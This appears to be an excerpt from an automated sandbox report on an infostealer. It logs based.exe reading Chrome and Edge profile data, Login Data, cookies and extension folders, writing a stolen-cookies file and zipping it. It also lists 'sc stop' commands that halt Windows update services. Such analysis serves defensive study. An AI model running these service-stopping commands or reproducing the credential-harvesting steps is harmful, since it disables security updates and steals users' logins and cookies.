Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es_419 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\lt VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ml VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mn VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\mr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\pt_PT VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\sw VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\te VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GraphiteDawnCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\OriginTrials VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\pnacl VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\eGGsf5wIUB.tmp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\eGGsf5wIUB.tmp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\weoPNOytXa.tmp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\weoPNOytXa.tmp VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ ? ? \Credentials\Chrome\Chrome Cookies.txt VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78122\rar.exe VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\wpNXr.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78002\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI78002\base_library.zip VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB2C7A0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF6CEB2C7A0

Source: C:\Users\user\Desktop\TS-240605-Millenium1.exe

Code function: 0_2_00007FF6CEB46B50 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF6CEB46B50

Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe

Code function: 5_2_0036D076 GetVersionExW,

5_2_0036D076

Source: C:\ProgramData\Microsoft\hacn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
